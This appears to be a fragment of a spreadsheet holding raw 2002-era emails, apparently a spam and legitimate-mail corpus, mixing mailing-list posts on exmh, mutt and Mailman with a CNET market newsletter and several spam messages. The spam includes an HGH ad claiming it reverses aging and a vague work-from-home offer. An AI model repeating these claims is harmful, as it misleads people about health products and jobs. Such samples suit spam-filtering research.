     &lt;table cellSpacing="5" cellPadding="0" width="100%" border="0"&gt;
       &lt;tr&gt;
         &lt;td vAlign="top" width="62%"&gt;&lt;small&gt;&lt;center&gt;
         &lt;p&gt;&lt;font face="Arial"&gt;
         &lt;img src="http://www.rootssearch.net/auction/cats.gif" width="16" height="16"&gt;
         &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl"&gt;
         Categories&lt;/a&gt;
         &lt;img src="http://www.rootssearch.net/auction/all.gif" width="16" height="16"&gt;
         &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=all"&gt;
         All&lt;/a&gt;
         &lt;img src="http://www.rootssearch.net/auction/new.gif" width="16" height="15"&gt;
         &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?category=&amp;listtype=new"&gt;
         New&lt;/a&gt;
         &lt;img src="http://www.rootssearch.net/auction/closing.gif" width="18" height="16"&gt;
         &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?category=&amp;listtype=close"&gt;
         Closing&lt;/a&gt;
         &lt;img src="http://www.rootssearch.net/auction/ending.gif" width="18" height="15"&gt;
         &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?category=&amp;listtype=gone"&gt;
         Going!&lt;/a&gt;
         &lt;img src="http://www.rootssearch.net/auction/allclosed.gif" width="16" height="15"&gt;
         &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=allclosed"&gt;
         All Closed&lt;/a&gt;
         &lt;img src="http://www.rootssearch.net/auction/post.gif" width="15" height="15"&gt;
         &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=new"&gt;
         Post&lt;/a&gt;
         &lt;img src="http://www.rootssearch.net/auction/register.gif" width="17" height="15"&gt;
         &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=reg"&gt;
         Register&lt;/a&gt;
         &lt;img src="http://www.rootssearch.net/auction/myauction.gif" width="15" height="14"&gt;
         &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=closed"&gt;
         My Auction&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;p&gt;&lt;font face="Arial" size="5"&gt;Tired of paying charges to Ebay, Yahoo 
         etc?&lt;br&gt;
         Now you don't have to!&amp;nbsp; Post your &lt;b&gt;&lt;font color="#B30000"&gt;
         genealogy&lt;/font&gt;&lt;/b&gt; auction&lt;br&gt;
         &lt;b&gt;&lt;font color="#B30000"&gt;FREE!&amp;nbsp; &lt;/font&gt;&lt;/b&gt;We're just like the big 
         boys!&lt;/font&gt;&lt;/p&gt;
         &lt;/small&gt;&lt;/center&gt;
         &lt;div align="center"&gt;
           &lt;center&gt;
           &lt;table borderColor="#111111" cellSpacing="0" width="50%" border="0" collapse&gt;
             &lt;tr&gt;
               &lt;td width="100%" bgColor="#800000"&gt;
               &lt;div align="center"&gt;
                 &lt;center&gt;
                 &lt;table style="BORDER-COLLAPSE: collapse" borderColor="#111111" cellSpacing="0" cellPadding="2" width="100%" border="0"&gt;
                   &lt;tr&gt;
                     &lt;td vAlign="top" align="middle" width="100%" colSpan="2"&gt;
                     &lt;font face="Arial" color="#ffffff" size="2"&gt;&lt;b&gt;Auction 
                     Categories&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td vAlign="top" width="50%" bgColor="#ffffff"&gt;
                     &lt;p align="left"&gt;
                     &lt;img src="http://www.rootssearch.net/auction/thecats.gif" border="0" width="20" height="15"&gt;&lt;font face="Arial" size="2"&gt;
                     &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=access"&gt;
                     Accessories&lt;/a&gt;&amp;nbsp; &lt;br&gt;
                     &lt;/font&gt;
                     &lt;img src="http://www.rootssearch.net/auction/thecats.gif" border="0" width="20" height="15"&gt;&lt;font face="Arial" size="2"&gt;
                     &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=books"&gt;
                     Books&lt;/a&gt; &lt;br&gt;
                     &lt;/font&gt;
                     &lt;img src="http://www.rootssearch.net/auction/thecats.gif" border="0" width="20" height="15"&gt;&lt;font face="Arial" size="2"&gt;
                     &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=paper"&gt;
                     Paper Items&lt;/a&gt; &lt;/font&gt;&lt;/td&gt;
                     &lt;td vAlign="top" width="50%" bgColor="#ffffff"&gt;
                     &lt;p align="left"&gt;
                     &lt;img src="http://www.rootssearch.net/auction/thecats.gif" border="0" width="20" height="15"&gt;&lt;font face="Arial" size="2"&gt;
                     &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=records"&gt;
                     Records&lt;/a&gt; &lt;br&gt;
                     &lt;/font&gt;
                     &lt;img src="http://www.rootssearch.net/auction/thecats.gif" border="0" width="20" height="15"&gt;&lt;font face="Arial" size="2"&gt;
                     &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=misc"&gt;
                     Everything Else&lt;/a&gt; &lt;/font&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;/center&gt;
               &lt;/div&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
         &lt;div align="center"&gt;
           &lt;center&gt;
           &lt;table style="BORDER-COLLAPSE: collapse" borderColor="#111111" cellSpacing="0" cellPadding="2" width="100%" border="0"&gt;
           &lt;/table&gt;
           &lt;font face="Arial"&gt;
           &lt;p align="center"&gt;Sell your item with buy it now, proxy bidding, 
           reserve and more!&lt;/p&gt;
           &lt;p align="center"&gt;&lt;b&gt;
           &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=reg"&gt;
           &lt;font size="7"&gt;Sign Up!&lt;/font&gt;&lt;/a&gt;&lt;font size="7"&gt; or
           &lt;a href="http://www.rootssearch.net"&gt;Visit Us!&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
           &lt;p align="center"&gt;&lt;font face="Arial" size="2"&gt;[
           &lt;a href="javascript:newWin=void(window.open('http://www.rootssearch.net/auction/helppost.html','newWin','scrollbars=1,width=400,height=500'))"&gt;
           FAQ&lt;/a&gt; ] [
           &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=suggest"&gt;
           Suggest A Category&lt;/a&gt; ] [
           &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=creg"&gt;
           Change Registration&lt;/a&gt; ] [
           &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=forgot"&gt;
           Lookup Username/Password&lt;/a&gt; ] [
           &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=searchfeedback"&gt;
           User Feedback&lt;/a&gt; ] [
           &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=referafriend"&gt;
           Tell A Friend&lt;/a&gt; ] &lt;br&gt;
           [ &lt;a href="http://www.rootssearch.net/cgi-bin/auction/wanted.pl"&gt;
           Auction Items Wanted&lt;/a&gt; ] [
           &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=notify"&gt;
           Auction Notification&lt;/a&gt; ] [
           &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=tracking"&gt;
           Item Tracking&lt;/a&gt; ] [
           &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=fraud"&gt;
           Report Auction Fraud&lt;/a&gt; ] [
           &lt;a href="http://www.rootssearch.net/cgi-bin/auction/ezauct.pl?action=banmenu"&gt;
           Ban A Bidder&lt;/a&gt; ] [ &lt;a href="http://www.rootssearch.net"&gt;Home&lt;/a&gt; ]
           &lt;/font&gt;&lt;/p&gt;
           &lt;/font&gt;&lt;/center&gt;
         &lt;/div&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="62%" valign="top"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;center&gt;
 &lt;table border="0" width="99%" cellspacing="0" bgcolor="#800000"&gt;
   &lt;tr&gt;
     &lt;td width="100%"&gt;&lt;div align="center"&gt;&lt;center&gt;&lt;table border="0" width="100%"
     cellpadding="2" cellspacing="0"&gt;
       &lt;tr&gt;
         &lt;td width="100%" bgcolor="#F8F8F1"&gt;&lt;p align="center"&gt;&lt;small&gt;&lt;font face="Arial"&gt;&lt;a
         href="http://www.rootssearch.net/cgi-bin/rsearch/add.cgi"&gt;Add a Site&lt;/a&gt; 
         | &lt;a
         href="http://www.rootssearch.net/about.html"&gt;About&lt;/a&gt; | &lt;a
         href="http://www.rootssearch.net/advertise.html"&gt;Advertise&lt;/a&gt; | &lt;a
         href="http://www.rootssearch.net/jobs.html"&gt;Jobs&lt;/a&gt; | &lt;a
         href="http://www.rootssearch.net/webmasters.html"&gt;Webmasters&lt;/a&gt; |&lt;/font&gt; 
         &lt;font
         face="Arial"&gt;&lt;a href="http://www.rootssearch.net/contact.html"&gt;Contact&lt;/a&gt; | &lt;a
         href="http://www.rootssearch.net/start.html"&gt;Make RS Your Start Page&lt;/a&gt;&lt;/font&gt;&lt;/small&gt;&lt;font
         face="Verdana"&gt;&lt;br&gt;
         &lt;/font&gt;&lt;font face="Arial"&gt;&lt;small&gt;&lt;a href="http://www.rootssearch.net"&gt;RootsSearch.net&lt;/a&gt;
         is  2001.&amp;nbsp; All rights reserved.&lt;/small&gt;&lt;/font&gt;&lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;/center&gt;&lt;/div&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;&lt;/div&gt;
    &lt;BR&gt;&lt;BR&gt;
 &lt;HR&gt;&lt;BR&gt;
 &lt;center&gt;You or someone through this email address has requested&lt;BR&gt;
 to receive third party mailings.  To be removed from&lt;BR&gt;
 future mailings click the link below.&lt;BR&gt;
 &lt;A HREF="http://www.whenopportunityknocks.com/cgi-bin/list/mailmachine.cgi?fork@xent.com"&gt;http://www.whenopportunityknocks.com/cgi-bin/list/mailmachine.cgi?fork@xent.com&lt;/A&gt;&lt;BR&gt;
 ---------------------------------------------------------------------
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Minor feature request
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; How easy would it be to code a menu item that marks as read all messages 
 &gt; before the current message?  I often have problems reading heavy-traffic 
 &gt; mailing lists in exmh because I want to read only a subset of a lists 
 &gt; messages, but I lose track of where I was in the particular folder.  
 &gt; 
 &gt; This could also be coded more generally in the new sequences code as a way to 
 &gt; remove all messages before current from a particular sequence.
 Easy.
 First, you'll have to excuse me as I'm still using 2.3.1 (*), so, this
 may not play well with recent changes.  (I did look at 2.5.1, too).
 And, I just did this off the top of my head (I wanted to see if it
 (**) still worked), so this is somewhat untested.
 Adding a menu entry is trivial; add this to your ~/.exmh/exmh-defaults:
 *Fops.more.m.uentrylist:	ketchup
 *Fops.more.m.l_ketchup:		Catch-up all b4 cur
 *Fops.more.m.c_ketchup:	 	My_Mark2CurSeen
 Then you just need to provide the source for My_Mark2CurSeen and 
 arrange for Exmh to include it (put it in your ~/.tk/exmh directory
 in your user.tcl; or in pick.patch if you enable the "source hook"
 under Prefs-&gt;Hacking Support)
 It's going to look something like this:
 proc My_Mark2CurSeen {} {
     global exmh pick msg
     Exmh_Status "Clearing unseen up to cur..." red
     Mh_SetCur $exmh(folder) $msg(id)
     set pick(ids) [...get message ids for "pick 1-cur"...]
     busy PickMarkSeen
     Exmh_Status ok blue
 }
 (that's based upon the guts of Pick_MarkSeen)
 You need to fill in the code for the [...get...] section; I ran out of
 time!
 John
 (*) "It just works" (tm)
 (**) "it" == my head
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "TP" == Tim Peters &lt;tim.one@comcast.net&gt; writes:
   &gt;&gt; First test results using tokenizer.Tokenizer.tokenize_headers()
   &gt;&gt; unmodified.  ...  Second test results using
   &gt;&gt; mboxtest.MyTokenizer.tokenize_headers().  This uses all headers
   &gt;&gt; except Received, Data, and X-From_.  ...
   TP&gt; Try the latter again, but call the base tokenize_headers() too.
 Sorry.  I haven't found the time to try any more test runs.  Perhaps
 later today.
 Jeremy
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get your own fountain of youth! HGH human growth hormone from 21st Century!17441
</t>
  </si>
  <si>
    <t xml:space="preserve">As seen on NBC, CBS, CNN, and even Oprah! The health discovery that actuallyreverses aging 
 while burning fat, without dieting or exercise! This provendiscovery has even been reported 
 on by the New England Journal of Medicine.Forget aging and dieting forever! And it's 
 Guaranteed! 
 Click below to enter our web site:
 http://market.liangshanpo.com/hgh/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Click below to enter our web site:
 http://market.liangshanpo.com/hgh/
 **************************************************
 If you want to get removed
 from our list please email at- affiliateoptout@btamail.net.cn
 (subject=remove "your email")
 **************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 20, 2002 at 12:06:18PM +0100, Philip Reynolds mentioned:
 &gt; John P. Looney's [valen@tuatha.org] 11 lines of wisdom included:
 &gt; &gt;  OK, Mutt uses sendmail to deliver mail...
 &gt; &gt; 
 &gt; &gt;  How can I get it to deliver via a Postfix box with SMTP auth enabled ?
 &gt; 
 &gt; Mutt interacts with smtpdaemon or something like that doesn't it?
 &gt; 
 &gt; Can mutt interact directly with SMTP server with authentication
 &gt; capabilities? I don't think it can. 
 &gt; 
 &gt; Surely you can just run a mailserver on your own machine and send
 &gt; mail using it? 
  Hmm. Yeah, mutt sorta calls the sendmail program directly. But I thought
 it would be very crap if the auth details (username, password) had to be
 hardcoded into the sendmail.cf (and damned if I can work out how to do
 that anyway).
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;There is a hot dispute about the original size of the indigenous
 &gt;population, but the evidence for a high density in the Mexican area is
 &gt;sound.  It was up here in the North or in the Amazon where I'm a little
 &gt;more suspicious of very high upward revisions.
 Right, there was definitely a relatively high density in Mexico, and
 much less elsewhere.  Population estimates vary wildly and about all
 your average skeptic can do is take geometric means to get ballpark
 figures.  While Central America may have had 20 or 30 million, vast
 areas of South America were uninhabited and other places very
 sparsely e.g., the plains Indians in what is now the U.S. may have
 been 2 million or so.
 There are those who claim that the Mexican population declined from
 20 something million to circa 8 or 10 million in the 16th century,
 certainly, in part due to infectious diseases new and old, and other
 factors, and was probably in decline before contact.  Others claim it
 declined from 80-ish million to 3 or 4 million and somehow deduce 95%
 mortality from imported diseases, and have a pretty clear agenda which
 makes me (for one) take their claims with a large grain of salt.
 About all that is certain is that anyone alive in 1500 was dead in 1600,
 in the Americas or elsewhere.
 R
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Mp3 ve klipler
</t>
  </si>
  <si>
    <t xml:space="preserve">JetMp3 T=FCrkiye'de ilk kez uygulanan bir sistemi hayata ge=E7irdi.
 http://www.jetmp3.com
 Bu sistemle art=FDk =DDstedi=F0iniz MP3 leri ister tek tek isterseniz alb=
 =FCmler halinde ve birka=E7 dakika i=E7inde sanki disketten bilgisayar=FD=
 n=FDza y=FCkler gibi s=FCratle indirebilirsiniz. Turk ve Yabanc=FD alb=FC=
 mler, klipler ve daha fazlas=FD...
 11gb lik ar=FEivimize g=F6z atmak i=E7in t=FDklay=FDn: http://www.jetmp3.=
 com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</si>
  <si>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&gt;&gt;&gt;&gt;&gt; "E" == Eirikur Hallgrimsson &lt;eh@mad.scientist.com&gt; writes:
     E&gt; Absolutely, and I've wanted to recapture it.  
 I don't know about this /particular/ mood, but I have used
 neuro-conditioning with aiding children in stressful
 life-circumstances.
 Basically, you somehow evoke the state you want, and when you get it,
 you do something odd, anything at all will do, but I used a gentle
 "vulcan grip" on their shoulder.  Later, when faced with the
 uncomfortable situation, you can retrieve /part/ of that earlier more
 desireable state by giving them the pinch; it's not perfect (like you
 get with simpler brains) but it is an inescapable effect.
 This is probably the neuro-effect that leads to performance-enhancing
 superstitions such as Bob Dylan not performing without his favourite
 jean jacket: Because it provides the cue to a more relaxed mental
 state, he really does play better with it than without it.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: WORK FROM HOME.  WE ARE HIRING
</t>
  </si>
  <si>
    <t xml:space="preserve">Help wanted.  We are a 14 year old fortune 500 company, that is
 growing at a tremendous rate.  We are looking for individuals who
 want to work from home.
 This is an opportunity to make an excellent income.  No experience
 is required.  We will train you.
 So if you are looking to be employed from home with a career that has
 vast opportunities, then go:
 http://www.basetel.com:27000/wealthnow
 We are looking for energetic and self motivated people.  If that is you
 than click on the link and fill out the form, and one of our
 employement specialist will contact you.
 To be removed from our link simple go to:
 http://www.basetel.com:27000/remove.html
 7227aeeO9-622YVDD8442BJPk2-748ZYrZ8462VnMG1-197fVVA2035gqEj3-l57
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Email list management howto
</t>
  </si>
  <si>
    <t xml:space="preserve">Justin MacCarthy wrote:
 &gt; I think I'll ask this question again, as I sent on friday afternoon.  :-) 
 Mailman ;-)
 Trust me, you do *not* want to running your own mailing lists
 on your own software.
 You'll wind up crying in a dark room looking for something
 high-voltage to stick your fingers into.
 Regards,
 Vin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Which Muppet Are You?
</t>
  </si>
  <si>
    <t xml:space="preserve">Apols if this has been posted before:
 http://www.pinkpaperclips.net/subs/quiz2.html
 Rob
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NEWS.COM INVESTOR: Techs fall again with telecoms, Dow drops below 8K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</si>
  <si>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 /&gt;&lt;br /&gt;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href="http://clickthru.online.com/Click?q=4b-k_l7IBUWWfh8AsWP9VA35c54JMcR"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href="http://clickthru.online.com/Click?q=60-oqItIsE3hXMC0YGLN8S_eSgFWVRR" &gt;My Portfolio&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=75-whwtIKU3zcAGroK_rjups7LLZ5ZR" &gt;Broker Reports&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=8a-3y3dQXnM4H3AnjoO3Nt-tKChBwnR" &gt;IPOs&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQB7c3GgwG4UByjw2PB1s7iR" &gt;Splits&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7Uq53PUU_91PHq15ZNEEZPR" &gt;Messages&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;!-- /nav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href="http://clickthru.online.com/Click?q=ca-iciuQUgTC8pcVTWcl8jfOfRHHUnR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLETxjC2W9BfbQq-Kh1XhaeR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f4-Y-XEQ0sDSAhv1K1uUJ5QddfWmTyR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=09-joDSIj8jsJ9uis-LYSS7ZMgtY8lR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jPxRjN7tRqEsB8LE27qd4R"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22,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href="http://clickthru.online.com/Click?q=33-vUjnINjcJEkusUkz6yClxb-7XsrR" &gt;DJIA&lt;/a&gt;&lt;br&gt;7784.58 &amp;nbsp;&lt;font color=#cc0000&gt;-234.68&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBwVd_qV3UXl_kj2ZBSJuRR" &gt;NASDAQ&lt;/a&gt;&lt;br&gt;NA &amp;nbsp;&lt;font color=#cc0000&gt;-36.50&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0w8dxFOwEobvZm5yGKIaZR" &gt;S&amp;P 500&lt;/a&gt;&lt;br&gt;819.85 &amp;nbsp;&lt;font color=#cc0000&gt;-27.90&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=73-__ZeIBB9PqiT9ijT8UEE0WNrUZcR" &gt;CNET&amp;nbsp;TECH&lt;/a&gt;&lt;br&gt;897.37 &amp;nbsp;&lt;font color="#cc0000"&gt;&lt;font color=#cc0000&gt;-48.86&lt;/font&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;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fall again with telecoms, Dow drops below 8K&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 The day after WorldCom Group filed for bankruptcy protection, telecom shares suffered and helped drag down the tech sector.
 &lt;p&gt;
 BellSouth stock tumbled 18.07 percent after it missed Wall Street's earnings target and offered a worse-than-expected outlook.  With shares of SBC Communications, Qwest Communications International, Sprint and AT&amp;T also dropping, CNET's Tech index shed 48.86 points, or 5.3 percent, to 897.37. The tech-heavy Nasdaq composite index fell 36.5 points, or 2.77 percent, to 1,282.55.
 &lt;p&gt;
 With a report raising questions about Citigroup and J.P. Morgan Chase &amp; Co.'s role in the Enron fiasco, broader markets lost ground as well. After a see-saw session, the Dow Jones industrials ended down 234.7 points, or 2.93 percent, to 7,784.5. The S&amp;P 500 slid 27.90 points, or 3.29 percent, to 819.85.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href="http://clickthru.online.com/Click?q=88-ec5PQQKHiqOVSUx-rU358atSBbiR" &gt;BellSouth posts lower second-quarter profits &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 BellSouth Corp., the No. 3 U.S. local telephone company, on Monday posted lower second-quarter profits due to slack demand and turbulent economic conditions in North America and Latin America.
 BellSouth, the dominant local telephone company in nine Southeastern states from Kentucky to Florida, said net income fell to 16 cents a share from 47 cents a year earlier. &lt;br&gt;&lt;B&gt;BELLSOUTH CORP 22.61 -18.11% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=9d-kkCWQv0hoCcBmdnuKLvd75wKZzPR" &gt;WorldCom, BellSouth news adds to telecom gloom &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 WorldCom Inc.'s bankruptcy filing is only the latest in a long line of sad news for a slumping telecom industry grappling with soft demand, falling earnings and worries about accounting.
 And things are not likely to change any time soon, as signaled by BellSouth Corp.'s disappointing second-quarter earnings and downward revision to its full-year outlook, analysts and investors said on Monday.&lt;br&gt;&lt;B&gt;WORLDCOM INC-WORLDCOM TRCK STK 0.14 55.56% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b2-M4pwQX04Ac0VI5YjM2cmpxUCPunR" &gt;HP seeks Texas justice; Gateway dinged &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 In separate court cases, a Florida jury dinged Gateway for sending phone calls to the wrong business, and a federal court in Houston issued an injunction barring Emachines from selling products that infringe on Hewlett-Packard patents.
 A jury in Florida ruled last week that Gateway must pay $3.6 million for a typo in which it sent customers with a PC problem to an 800 number owned by Pensacola, Fla.-based Mo' Money Associates instead of the company's own complaint line, which had a similar number but with an 888 prefix.&lt;br&gt;&lt;B&gt;HEWLETT-PACKARD CO 12.00 -6.25%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href="http://clickthru.online.com/Click?q=c7-KG43QLPPHlPupi8NWtUoF24wxeeR"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href="http://clickthru.online.com/Click?q=dc-40zzQ0LQv504rTvBz6gEwTinhlyR" &gt;Banc of America Securities stays with "buy" rating on Novellus Systems in note 7/22/02 &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Analyst Mark FitzGerald expects the chip equipment maker to meet his revenue and earnings estimates of $225 million and 10 cents per share when it reports second-quarter results after the market close. He anticipates earnings guidance for the current quarter of 15-20 cents per share. The stock could move a bit higher, but FitzGerald believes better data from end markets is needed for a sustained rally. He also expects the firm to announce it will pay back $880 million in debt.&lt;br&gt;&lt;B&gt;NOVELLUS SYSTEMS 29.55 -0.81% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsTLZozfIQH3XX8owMnerlR"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href="http://clickthru.online.com/Click?q=06-fP6uI481hDh4T6omap_vCgSyiL4R" &gt;Tyco CFO's tenure seen ending as confidence wanes &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Tyco International Ltd.'s earnings release on Tuesday may very well be the last for Chief Financial Officer Mark Swartz, whose tenure has been marred by his close association with the conglomerate's disgraced former chairman.
 Named CFO in 1995, Swartz has been the chief defender of Tyco's accounting, which has drawn fire for being opaque and misleading. But perhaps more important, Swartz was a key adviser and architect in Dennis Kozlowski's decade-long acquisition binge to build Tyco into one of the world's largest manufacturing conglomerates.&lt;br&gt;&lt;B&gt;TYCO INTERNATIONAL 11.85 -5.12% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFraA1G4Ol3n9kgGa2oXqGyR"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href="http://clickthru.online.com/Click?q=31-V_YRIjMwk68Iq0ZyLxjkqVAXXblR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/06060digidark.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
         &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=46-19zwInpkGBN6jR6a1cN0535V0Y9R"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href="http://clickthru.online.com/Click?q=5b-5LOwIBKkZU9Ab8qxCjjvDSwizzcR" &gt;Panasonic's littlest Lumix&lt;/a&gt;&lt;br /&gt;
         &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdpiyGZegozKns2asfI8UkRR"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href="http://clickthru.online.com/Click?q=85-2G2oQ7KrekDiVnTaf70SVbToBBPR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         2. &lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIm1-0Wzme0dAVJ9PZAKTrR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         3. &lt;a href="http://clickthru.online.com/Click?q=b0-NZmfQQJQNkl8fQtdxQMKtNX8PQiR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         4. &lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzO4Tpi03SMzSROUJEymxqPR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         5. &lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUP7liO4tRBbjsMVKpv3DxnR" &gt;Sony Cyber Shot DSC-F707&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
